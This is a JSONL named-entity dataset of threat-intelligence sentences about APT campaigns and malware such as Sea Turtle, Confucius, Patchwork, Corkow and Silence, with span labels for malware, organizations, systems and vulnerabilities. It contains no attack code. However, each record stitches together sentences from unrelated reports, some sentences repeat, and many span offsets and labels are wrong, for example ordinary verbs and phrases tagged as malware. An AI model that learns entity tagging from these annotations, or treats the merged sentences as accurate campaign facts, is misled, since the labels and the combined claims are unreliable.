"Organization"}]} {"text": "The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . 
The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries are also targeted .", "spans": [{"start": 4, "end": 17, "label": "Organization"}, {"start": 110, "end": 124, "label": "Malware"}, {"start": 264, "end": 268, "label": "Organization"}, {"start": 269, "end": 277, "label": "Organization"}]} {"text": "The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . There are new TTPs used in this attack \u2013 for example Agent_Drable is leveraging the Django Python framework for command and control infrastructure , the technical details of which are outlined later in the blog .", "spans": [{"start": 67, "end": 77, "label": "Malware"}, {"start": 92, "end": 105, "label": "Malware"}, {"start": 219, "end": 225, "label": "Malware"}, {"start": 226, "end": 232, "label": "System"}]} {"text": "If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . n summary , Cold River is a sophisticated threat actor making malicious use of DNS tunneling for command and control activities , compelling lure documents , and previously unknown implants .", "spans": [{"start": 38, "end": 47, "label": "System"}, {"start": 50, "end": 52, "label": "Malware"}, {"start": 63, "end": 89, "label": "Malware"}, {"start": 224, "end": 237, "label": "Malware"}]} {"text": "The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell's 1984 , but Weeping Angel , developed by the CIA's Embedded Devices Branch (EDB) , which infests smart TVs , transforming them into covert microphones , is surely its most emblematic realization . 
Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor .", "spans": [{"start": 111, "end": 124, "label": "System"}, {"start": 144, "end": 149, "label": "Organization"}, {"start": 196, "end": 205, "label": "System"}, {"start": 208, "end": 220, "label": "Malware"}, {"start": 308, "end": 315, "label": "Vulnerability"}, {"start": 389, "end": 394, "label": "System"}, {"start": 439, "end": 444, "label": "System"}]} {"text": "Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies . The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries may have also been targeted .", "spans": [{"start": 33, "end": 42, "label": "Malware"}, {"start": 113, "end": 125, "label": "Malware"}, {"start": 248, "end": 261, "label": "Organization"}]} {"text": "The Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . 
The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 173, "end": 177, "label": "Malware"}, {"start": 237, "end": 252, "label": "Malware"}, {"start": 265, "end": 271, "label": "System"}, {"start": 272, "end": 280, "label": "Vulnerability"}, {"start": 323, "end": 334, "label": "Organization"}, {"start": 338, "end": 348, "label": "Organization"}]} {"text": "UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . The use of InPage as an attack vector is not commonly seen , with the only previously noted attacks being documented by Kaspersky in late 2016 .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 19, "end": 35, "label": "Malware"}, {"start": 38, "end": 57, "label": "Malware"}, {"start": 60, "end": 74, "label": "Malware"}, {"start": 77, "end": 93, "label": "Malware"}, {"start": 96, "end": 107, "label": "Malware"}, {"start": 110, "end": 130, "label": "Malware"}, {"start": 133, "end": 140, "label": "Malware"}, {"start": 174, "end": 180, "label": "Malware"}, {"start": 205, "end": 211, "label": "Malware"}, {"start": 314, "end": 323, "label": "Organization"}]} {"text": "'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS (JukeBox) and Linux (DanceFloor) . 
The decoy documents dropped suggest that the targets are likely to be politically or militarily motivated , with subjects such as Intelligence reports and political situations being used as lure documents .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 29, "end": 42, "label": "Malware"}, {"start": 45, "end": 60, "label": "Malware"}, {"start": 63, "end": 76, "label": "Malware"}, {"start": 81, "end": 97, "label": "Malware"}, {"start": 249, "end": 264, "label": "Indicator"}, {"start": 315, "end": 326, "label": "Organization"}, {"start": 330, "end": 340, "label": "Organization"}, {"start": 400, "end": 409, "label": "Organization"}]} {"text": "This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . While documents designed to exploit the InPage software are rare , they are not new \u2013 however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky .", "spans": [{"start": 5, "end": 11, "label": "Malware"}, {"start": 31, "end": 40, "label": "Malware"}, {"start": 72, "end": 87, "label": "Malware"}, {"start": 119, "end": 127, "label": "Malware"}, {"start": 278, "end": 285, "label": "Vulnerability"}, {"start": 290, "end": 305, "label": "Malware"}, {"start": 360, "end": 366, "label": "Organization"}, {"start": 389, "end": 395, "label": "System"}, {"start": 396, "end": 404, "label": "Vulnerability"}, {"start": 468, "end": 475, "label": "Vulnerability"}, {"start": 500, "end": 509, "label": "Organization"}]} {"text": "The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . 
Confucius targeted a particular set of individuals in South Asian countries , such as military personnel and businessmen , among others .", "spans": [{"start": 4, "end": 22, "label": "Malware"}, {"start": 71, "end": 80, "label": "Malware"}, {"start": 200, "end": 218, "label": "Organization"}, {"start": 223, "end": 234, "label": "Organization"}]} {"text": "Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 \u2014 the same date the first authenticated login to Visma\u2019s network was made using stolen credentials . Tweety Chat 's Android version can record audio , too .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 111, "end": 124, "label": "Malware"}, {"start": 155, "end": 167, "label": "Malware"}, {"start": 302, "end": 313, "label": "Malware"}, {"start": 317, "end": 324, "label": "System"}]} {"text": "This powerful backdoor can receive commands from the attackers , enabling it to ex\ufb01ltrate \ufb01les from the system it is running on , execute additional scripts , delete \ufb01les , and more . Confucius' operations include deploying bespoke backdoors and stealing files from their victim 's systems with tailored file stealers , some of which bore resemblances to Patchwork 's .", "spans": [{"start": 14, "end": 22, "label": "Malware"}, {"start": 80, "end": 94, "label": "Malware"}, {"start": 130, "end": 156, "label": "Malware"}, {"start": 159, "end": 170, "label": "Malware"}, {"start": 355, "end": 364, "label": "Organization"}]} {"text": "In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . 
Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": [{"start": 23, "end": 32, "label": "Malware"}, {"start": 69, "end": 79, "label": "Malware"}, {"start": 125, "end": 134, "label": "Organization"}, {"start": 164, "end": 171, "label": "Vulnerability"}, {"start": 304, "end": 317, "label": "Vulnerability"}, {"start": 322, "end": 336, "label": "Vulnerability"}]} {"text": "The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx\u201d . Back in February , we noted the similarities between the Patchwork and Confucius groups and found that , in addition to the similarities in their malware code , both groups primarily went after targets in South Asia .", "spans": [{"start": 4, "end": 14, "label": "Malware"}, {"start": 15, "end": 21, "label": "Malware"}, {"start": 47, "end": 54, "label": "Malware"}, {"start": 286, "end": 295, "label": "Organization"}, {"start": 300, "end": 316, "label": "Organization"}]} {"text": "The malware was first seen packed with VMProtect; when unpacked the sample didn\u2019t show any similarities with previously known malware . 
Back in February , Trend Micro noted the similarities between the Patchwork and Confucius groups and found that , in addition to the similarities in their malware code , both groups primarily went after targets in South Asia .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 39, "end": 49, "label": "Malware"}, {"start": 155, "end": 166, "label": "Organization"}, {"start": 202, "end": 211, "label": "Organization"}, {"start": 216, "end": 232, "label": "Organization"}]} {"text": "The malware starts communicating with the C&C server by sending basic information about the infected machine . One of its file stealers , swissknife2 , abuses a cloud storage service as a repository of exfiltrated files .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 19, "end": 45, "label": "Malware"}, {"start": 138, "end": 149, "label": "Malware"}]} {"text": "The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . During the months that followed in which we tracked Confucius' activities , we found that they were still aiming for Pakistani targets .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 22, "end": 30, "label": "Malware"}, {"start": 40, "end": 54, "label": "System"}, {"start": 72, "end": 81, "label": "Organization"}]} {"text": "After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . 
During their previous campaign , we found Confucius using fake romance websites to entice victims into installing malicious Android applications .", "spans": [{"start": 34, "end": 45, "label": "Malware"}, {"start": 134, "end": 141, "label": "Malware"}, {"start": 349, "end": 356, "label": "System"}]} {"text": "This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge . Periodically , the malware tries to contact the command-and-control ( C&C ) server with the username encoded into parameters .", "spans": [{"start": 5, "end": 11, "label": "Malware"}, {"start": 65, "end": 89, "label": "Malware"}, {"start": 92, "end": 98, "label": "Malware"}, {"start": 101, "end": 107, "label": "Malware"}, {"start": 110, "end": 123, "label": "Malware"}, {"start": 128, "end": 142, "label": "Malware"}, {"start": 193, "end": 212, "label": "System"}, {"start": 215, "end": 218, "label": "System"}]} {"text": "It turns out that contacts data isn\u2019t the only unusual data SWAnalytics is interested in . This function is similar to the various versions of backdoors ( such as sctrls and sip_telephone ) that we analyzed in our previous blog post and whitepaper .", "spans": [{"start": 18, "end": 31, "label": "Malware"}, {"start": 60, "end": 71, "label": "Malware"}, {"start": 163, "end": 169, "label": "Malware"}, {"start": 174, "end": 187, "label": "Malware"}]} {"text": "With default settings , SWAnalytics will scan through an Android device\u2019s external storage , looking for directory tencent/MobileQQ/WebViewCheck\u201d . This algorithm was previously discussed by security researchers in a Confucius-related blog post .", "spans": [{"start": 24, "end": 35, "label": "Malware"}, {"start": 41, "end": 45, "label": "Malware"}]} {"text": "By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . 
Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 .", "spans": [{"start": 3, "end": 22, "label": "Malware"}, {"start": 25, "end": 36, "label": "Malware"}, {"start": 48, "end": 65, "label": "Malware"}, {"start": 118, "end": 127, "label": "Organization"}, {"start": 154, "end": 163, "label": "Indicator"}, {"start": 175, "end": 188, "label": "Vulnerability"}]} {"text": "To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control . The group still uses the Badnews malware , a backdoor with information-stealing and file-executing capabilities , albeit updated with a slight modification in the encryption routine at the end of 2017 , when they added Blowfish encryption on top of their custom encryption described in our former Patchwork blogpost .", "spans": [{"start": 50, "end": 61, "label": "Malware"}, {"start": 84, "end": 91, "label": "Malware"}, {"start": 96, "end": 123, "label": "Malware"}, {"start": 131, "end": 137, "label": "Malware"}, {"start": 185, "end": 192, "label": "Malware"}, {"start": 193, "end": 200, "label": "Malware"}, {"start": 457, "end": 466, "label": "Organization"}]} {"text": "Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . 
Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions \u2014 which are often not designed to handle the persistent and sophisticated threats detailed in this blog \u2014 ineffective .", "spans": [{"start": 37, "end": 45, "label": "Malware"}, {"start": 57, "end": 67, "label": "Malware"}, {"start": 151, "end": 160, "label": "Organization"}, {"start": 165, "end": 174, "label": "Organization"}]} {"text": "The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . The reality is that IT departments of small to large-sized organizations are not equipped to handle the more advanced threats that groups like Confucius use in their attacks .", "spans": [{"start": 21, "end": 30, "label": "Malware"}, {"start": 49, "end": 67, "label": "Malware"}, {"start": 90, "end": 107, "label": "Malware"}, {"start": 170, "end": 184, "label": "Organization"}]} {"text": "The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems . Patchwork uses email as an entry point , which is why securing the email gateACT is important .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 61, "end": 67, "label": "Malware"}, {"start": 70, "end": 78, "label": "Malware"}, {"start": 83, "end": 96, "label": "Malware"}, {"start": 99, "end": 125, "label": "Malware"}, {"start": 128, "end": 137, "label": "Organization"}]} {"text": "The PowerShell version of the Trojan also has the ability to get screenshots . 
This blog post examines two similar malware families that utilize the aforementioned technique to abuse legitimate websites , their connections to each other , and their connections to known espionage campaigns .", "spans": [{"start": 4, "end": 14, "label": "Malware"}, {"start": 61, "end": 64, "label": "Malware"}, {"start": 65, "end": 76, "label": "Malware"}]} {"text": "Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . In order to increase the likelihood of their malware successfully communicating home , Cyber Espionage threat actors are increasingly abusing legitimate web services , in lieu of DNS lookups to retrieve a command and control address .", "spans": [{"start": 22, "end": 30, "label": "Malware"}, {"start": 69, "end": 75, "label": "Organization"}, {"start": 174, "end": 196, "label": "Malware"}]} {"text": "BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e , possibly en masse . In 2013 , Rapid7 reported on a series of relatively amateur attacks against Pakistani targets .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 43, "end": 50, "label": "Malware"}, {"start": 120, "end": 130, "label": "Malware"}, {"start": 246, "end": 252, "label": "Organization"}]} {"text": "The backdoor can connect to any of the C&Cs from a hardcoded list \u2013 a measure to increase resilience . 
The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 .", "spans": [{"start": 4, "end": 12, "label": "Malware"}, {"start": 17, "end": 24, "label": "Malware"}, {"start": 132, "end": 143, "label": "Indicator"}, {"start": 262, "end": 268, "label": "Malware"}, {"start": 275, "end": 286, "label": "Malware"}, {"start": 307, "end": 313, "label": "Organization"}]} {"text": "China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 36, "end": 45, "label": "Organization"}, {"start": 58, "end": 65, "label": "Malware"}, {"start": 190, "end": 201, "label": "Indicator"}, {"start": 224, "end": 235, "label": "Indicator"}, {"start": 274, "end": 290, "label": "Malware"}]} {"text": "China Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of netstat an|find ESTABLISHED . The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 93, "end": 100, "label": "Malware"}, {"start": 138, "end": 149, "label": "Indicator"}, {"start": 213, "end": 235, "label": "System"}, {"start": 238, "end": 242, "label": "System"}]} {"text": "The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . 
We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover .", "spans": [{"start": 4, "end": 8, "label": "Malware"}, {"start": 9, "end": 21, "label": "Malware"}, {"start": 282, "end": 300, "label": "Malware"}, {"start": 309, "end": 320, "label": "Indicator"}, {"start": 342, "end": 350, "label": "Malware"}]} {"text": "Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B .", "spans": [{"start": 31, "end": 48, "label": "Malware"}, {"start": 61, "end": 69, "label": "Malware"}, {"start": 74, "end": 92, "label": "Malware"}, {"start": 132, "end": 139, "label": "Malware"}, {"start": 295, "end": 314, "label": "Organization"}, {"start": 329, "end": 340, "label": "Indicator"}, {"start": 345, "end": 356, "label": "Indicator"}]} {"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . In this blog post , we discussed two separate malware variations that behave in very similar ACTs and use similar techniques to acquire a C2 address , with both using Yahoo Answers and Quora to evade traditional mechanisms for blocking command and control domains .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 62, "end": 81, "label": "Malware"}, {"start": 243, "end": 245, "label": "System"}]} {"text": "The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . 
The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio .", "spans": [{"start": 4, "end": 20, "label": "Malware"}, {"start": 50, "end": 63, "label": "Malware"}, {"start": 97, "end": 112, "label": "Indicator"}]} {"text": "This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": [{"start": 15, "end": 22, "label": "Malware"}, {"start": 36, "end": 49, "label": "Malware"}, {"start": 112, "end": 120, "label": "Malware"}, {"start": 125, "end": 132, "label": "Malware"}, {"start": 150, "end": 170, "label": "Malware"}, {"start": 255, "end": 268, "label": "Vulnerability"}, {"start": 273, "end": 287, "label": "Vulnerability"}]} {"text": "They also download apks secretly and record audios and videos , then upload users\u2019 privacy information to server , causing users\u2019 privacy leakage . We dove deeper into Confucius' operations\u2014namely , the malware-ridden documents , backdoors , and file stealers they use in their campaigns .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 10, "end": 18, "label": "Malware"}, {"start": 24, "end": 32, "label": "Malware"}, {"start": 37, "end": 50, "label": "Malware"}, {"start": 69, "end": 75, "label": "Malware"}]} {"text": "The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . 
The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 18, "end": 37, "label": "Malware"}, {"start": 256, "end": 271, "label": "Malware"}, {"start": 325, "end": 338, "label": "Vulnerability"}]} {"text": "AdroMut downloads the malware ServHelper and FlawedAmmy RAT used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor . The documents that exploit CVE2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe .", "spans": [{"start": 8, "end": 29, "label": "Malware"}, {"start": 30, "end": 40, "label": "System"}, {"start": 45, "end": 55, "label": "System"}, {"start": 72, "end": 81, "label": "Organization"}, {"start": 190, "end": 197, "label": "Vulnerability"}, {"start": 198, "end": 211, "label": "Vulnerability"}, {"start": 242, "end": 258, "label": "System"}, {"start": 261, "end": 264, "label": "System"}, {"start": 291, "end": 303, "label": "System"}, {"start": 306, "end": 309, "label": "System"}, {"start": 394, "end": 403, "label": "Indicator"}]} {"text": "The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . In August 2015 a new incident related to the Corkow ( Metel ) Trojan was detected .", "spans": [{"start": 4, "end": 23, "label": "Malware"}, {"start": 96, "end": 103, "label": "Malware"}, {"start": 174, "end": 180, "label": "Malware"}, {"start": 183, "end": 188, "label": "Organization"}, {"start": 191, "end": 197, "label": "Malware"}]} {"text": "The exploit installs Silence\u2019s loader , designed to download backdoors and other malicious programs . Corkow provided remote access to the ITS-Broker system terminal by \u300a Platforma soft \u300b Ltd. 
, which enabled the fraud to be committed .", "spans": [{"start": 4, "end": 11, "label": "Vulnerability"}, {"start": 21, "end": 30, "label": "Organization"}, {"start": 52, "end": 70, "label": "Malware"}, {"start": 102, "end": 108, "label": "Malware"}]} {"text": "As we described in Silence: Moving into the darkside report , Silence has experience with theft using compromised card processing systems . According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list .", "spans": [{"start": 19, "end": 27, "label": "Organization"}, {"start": 62, "end": 69, "label": "Organization"}, {"start": 96, "end": 118, "label": "Malware"}, {"start": 203, "end": 221, "label": "Indicator"}, {"start": 296, "end": 318, "label": "Organization"}]} {"text": "The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . The interest among hackers in targeting trading systems is expected to grow .", "spans": [{"start": 17, "end": 35, "label": "Malware"}, {"start": 42, "end": 49, "label": "Malware"}]} {"text": "Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.EXE with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server . 
Russian-speaking hackers are believed to be responsible for these attacks and used the Corkow Trojan .", "spans": [{"start": 0, "end": 18, "label": "Malware"}, {"start": 59, "end": 67, "label": "Malware"}, {"start": 96, "end": 103, "label": "Malware"}, {"start": 128, "end": 145, "label": "Malware"}, {"start": 182, "end": 197, "label": "Malware"}, {"start": 322, "end": 335, "label": "Malware"}]} {"text": "PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . Hackers target primarily companies in Russia and CIS countries , though it is noticed that the amount of attacks targeting the USA has increased 5 times since 2011 .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 90, "end": 115, "label": "Malware"}, {"start": 120, "end": 130, "label": "Malware"}, {"start": 133, "end": 152, "label": "Malware"}, {"start": 155, "end": 172, "label": "Malware"}, {"start": 175, "end": 198, "label": "Malware"}, {"start": 225, "end": 244, "label": "Organization"}]} {"text": "A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests , TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . 
One of the first botnets specializing in targeting the trading software called Quik was \" Ranbyus \" , created in 2012 .", "spans": [{"start": 110, "end": 118, "label": "Malware"}, {"start": 128, "end": 157, "label": "Malware"}, {"start": 160, "end": 169, "label": "Malware"}, {"start": 174, "end": 185, "label": "Malware"}, {"start": 201, "end": 210, "label": "Malware"}, {"start": 316, "end": 320, "label": "Malware"}, {"start": 327, "end": 334, "label": "Malware"}]} {"text": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . As of the Group-IB investigation of this malware program in March 2015 , Corkow v.7.118.1.1 had not been detected by a single antivirus program .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 43, "end": 48, "label": "Malware"}, {"start": 154, "end": 162, "label": "Organization"}, {"start": 217, "end": 223, "label": "Malware"}]} {"text": "The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . Hackers gained access to a computer in the trading system in September 2014 .", "spans": [{"start": 35, "end": 42, "label": "Malware"}, {"start": 149, "end": 159, "label": "Malware"}]} {"text": "The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less\u201d aspect of this method . Starting in December 2014 , the criminal group began running keyloggers in the infected system .", "spans": [{"start": 8, "end": 15, "label": "Malware"}, {"start": 27, "end": 34, "label": "Malware"}, {"start": 186, "end": 196, "label": "Malware"}]} {"text": "In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger . 
To spread the Corkow malware criminals use a drive-by downloads method , when victims are infected while visiting compromised legitimate websites .", "spans": [{"start": 10, "end": 18, "label": "Malware"}, {"start": 53, "end": 61, "label": "Malware"}, {"start": 173, "end": 176, "label": "Malware"}]} {"text": "Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . Group-IB specialists detected various sites used by criminals to spread the Trojan : mail tracking websites , news portals , electronic books , computer graphics resources , music portals , etc .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 79, "end": 98, "label": "Malware"}, {"start": 108, "end": 117, "label": "Organization"}, {"start": 120, "end": 128, "label": "Organization"}, {"start": 196, "end": 202, "label": "Malware"}, {"start": 205, "end": 227, "label": "Malware"}, {"start": 230, "end": 242, "label": "Malware"}, {"start": 245, "end": 261, "label": "Malware"}, {"start": 264, "end": 291, "label": "Malware"}, {"start": 294, "end": 307, "label": "Malware"}]} {"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users .", "spans": [{"start": 18, "end": 27, "label": "Malware"}, {"start": 57, "end": 70, "label": "Malware"}, {"start": 113, "end": 131, "label": "Vulnerability"}, {"start": 153, "end": 165, "label": "Vulnerability"}]} {"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . 
Group-IB Bot-trek TDS sensors are in place at a number of financial institutions and , unfortunately , we register that currently Corkow malware is present on 80% of protected corporate systems .", "spans": [{"start": 18, "end": 27, "label": "Malware"}, {"start": 57, "end": 70, "label": "Malware"}, {"start": 86, "end": 94, "label": "Organization"}, {"start": 144, "end": 166, "label": "Organization"}, {"start": 216, "end": 222, "label": "Malware"}, {"start": 223, "end": 230, "label": "Malware"}]} {"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . Considering the Trojan delivery method and through our analysis of infections on banks' networks , we can confirm that all infections were conducted on a random basis .", "spans": [{"start": 18, "end": 27, "label": "Malware"}, {"start": 57, "end": 70, "label": "Malware"}, {"start": 102, "end": 108, "label": "Malware"}]} {"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 .", "spans": [{"start": 22, "end": 26, "label": "Malware"}, {"start": 27, "end": 65, "label": "Malware"}, {"start": 189, "end": 195, "label": "Malware"}, {"start": 214, "end": 219, "label": "Organization"}]} {"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . 
Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 102, "end": 109, "label": "Malware"}, {"start": 137, "end": 147, "label": "Malware"}, {"start": 152, "end": 159, "label": "Malware"}, {"start": 224, "end": 230, "label": "Malware"}]} {"text": "Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll\u201d along with a standard Vawtrak trojan . Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries .", "spans": [{"start": 76, "end": 84, "label": "Malware"}, {"start": 102, "end": 114, "label": "Malware"}, {"start": 117, "end": 124, "label": "Malware"}, {"start": 189, "end": 195, "label": "Malware"}]} {"text": "RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism . Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 7, "end": 29, "label": "Malware"}, {"start": 185, "end": 192, "label": "System"}, {"start": 193, "end": 200, "label": "Vulnerability"}, {"start": 243, "end": 248, "label": "Organization"}, {"start": 281, "end": 283, "label": "Indicator"}]} {"text": "RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself . 
In addition to the legitimate AmmyAdmin tool , the hackers used Visconti Backdoor developed based on legitimate RMS ( remote manipulator system ) software .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 12, "end": 19, "label": "Malware"}, {"start": 77, "end": 88, "label": "Organization"}, {"start": 98, "end": 128, "label": "Malware"}, {"start": 173, "end": 187, "label": "Malware"}, {"start": 207, "end": 224, "label": "Malware"}, {"start": 255, "end": 258, "label": "System"}, {"start": 261, "end": 286, "label": "System"}]} {"text": "This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices . If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs .", "spans": [{"start": 5, "end": 12, "label": "Malware"}, {"start": 35, "end": 71, "label": "Malware"}, {"start": 76, "end": 105, "label": "Malware"}, {"start": 140, "end": 143, "label": "Indicator"}]} {"text": "From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August . To obtain logins and passwords they applied keyloggers built into Corkow , as well as a commonly used feature of Mimikatz , dumping clear text Windows credentials from LSA .", "spans": [{"start": 43, "end": 48, "label": "Malware"}, {"start": 74, "end": 83, "label": "Malware"}, {"start": 201, "end": 211, "label": "Malware"}, {"start": 223, "end": 229, "label": "Malware"}, {"start": 300, "end": 307, "label": "System"}]} {"text": "Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before . 
